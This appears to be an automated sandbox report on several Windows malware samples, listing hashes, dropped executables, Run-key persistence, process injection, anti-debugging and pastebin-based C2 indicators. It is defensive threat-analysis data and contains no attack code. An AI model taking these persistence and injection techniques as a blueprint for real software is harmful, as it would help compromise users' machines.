| MD5 | 56b2c3810dba2e939a8bb9fa36d3cf96 |
| SHA1 | 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc |
| SHA256 | 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07 |
| SHA512 | 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YGRQ0H1Z\k2[1].rar
| MD5 | d3b07384d113edec49eaa6238ad5ff00 |
| SHA1 | f1d2d2f924e986ac86fdf7b36c94bcdf32beec15 |
| SHA256 | b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c |
| SHA512 | 0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6 |
C:\Users\Admin\AppData\Local\Temp\67DD4EB2.exe
| MD5 | 20879c987e2f9a916e578386d499f629 |
| SHA1 | c7b33ddcc42361fdb847036fc07e880b81935d5d |
| SHA256 | 9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31 |
| SHA512 | bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f |
C:\Users\Admin\AppData\Local\Temp\4c6c54cc.bat
| MD5 | 97211e05be2806ed784ed7d5a9f673f1 |
| SHA1 | 22613a40afbbe4e4d85a7a4b6f2faafd309b1542 |
| SHA256 | 56d84f77e0690b656e83032165eb60dac337b373bec7491dce4b703628b181be |
| SHA512 | e16c22414e2f131fd961203d734af23c0a0e3051d3b121fc76a4cdab18920cfc9ef2a3a93fb683e0f8ceac6ea6200bbc198d8f233cbeef5a0ce7055446c59dde |
Analysis: behavioral11
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
148s
Max time network
160s
Command Line
Signatures
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe"
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
97s
Max time network
145s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\system32\RDR4.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\system32\RDR4.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
| File opened for modification | C:\Program Files\system32\RDR4.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
| File created | C:\Program Files\system32\stTfuo7I.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
| File opened for modification | C:\Program Files\system32\stTfuo7I.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
| File opened for modification | C:\Program Files\system32 | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
| File created | C:\Program Files\system32\__tmp_rar_sfx_access_check_240607703 | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1996 wrote to memory of 5116 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | C:\Program Files\system32\RDR4.exe |
| PID 1996 wrote to memory of 5116 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe | C:\Program Files\system32\RDR4.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe"
C:\Program Files\system32\RDR4.exe
"C:\Program Files\system32\RDR4.exe"
Network
Files
C:\Program Files\system32\RDR4.exe
| MD5 | de431fe64329b3dde12f288898cba489 |
| SHA1 | b8f1f3d0b2cc37cc4aa041046fa9ced2bc92f6ad |
| SHA256 | 157d83991428e260d9e07c6d8679d35835d6c8c3d8ac1b5669ec10419f4e0e9f |
| SHA512 | b7127225c5dcd2d027158cbc11eaebaef8f674ec0ff775f6eb11bc43692ad90c52af558590131543de803f0223d66dad69c776034adddaab613299afea26e95a |
Analysis: behavioral25
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
93s
Max time network
147s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3012 wrote to memory of 4408 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3012 wrote to memory of 4408 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3012 wrote to memory of 4408 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\dutchlove2.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\dutchlove2.dll,#1
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
7s
Max time network
164s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe"
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\explorer.exe
explorer.exe /LOADSAVEDWINDOWS
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
159s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 908 created 624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation | C:\Program Files\Node64.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Program Files\Node64.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node32.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node2Json.exe | N/A |
| N/A | N/A | C:\Windows\System32\$Node3Json.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Node64 = "C:\\Program Files\\Node64.exe" | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe" | C:\Program Files\Node64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe" | C:\Program Files\Node64.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe" | C:\Program Files\Node64.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_72ab89a5cc3218be\machine.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\usbport.inf_amd64_230f9025c8623e5d\usbport.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_230f9025c8623e5d\usbport.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\System32\$Node2Json.exe | C:\Program Files\Node64.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\input.inf_amd64_71e43a6eaa912e56\input.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\machine.inf_amd64_72ab89a5cc3218be\machine.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node32.exe | C:\Program Files\Node64.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\hdaudbus.inf_amd64_e89200d3ede2154e\hdaudbus.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_71e43a6eaa912e56\input.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\mshdc.inf_amd64_f6ccd5b2c8226c4a\mshdc.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_e89200d3ede2154e\hdaudbus.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File created | C:\Windows\System32\$Node32.exe | C:\Program Files\Node64.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node2Json.exe | C:\Program Files\Node64.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node3Json.exe | C:\Program Files\Node64.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_f6ccd5b2c8226c4a\mshdc.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\$Node3Json.exe | C:\Program Files\Node64.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 908 set thread context of 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WinRAR\Temp\Updater.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe | N/A |
| File created | C:\Program Files\Node64.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\System32\$Node32.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\System32\DxDiag.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\DxDiag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\System32\DxDiag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\System32\DxDiag.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\System32\DxDiag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\System32\DxDiag.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={48F3852C-80C8-4EFC-8BC2-B3FC8C353B59}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 02 Dec 2024 16:13:27 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733156003" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
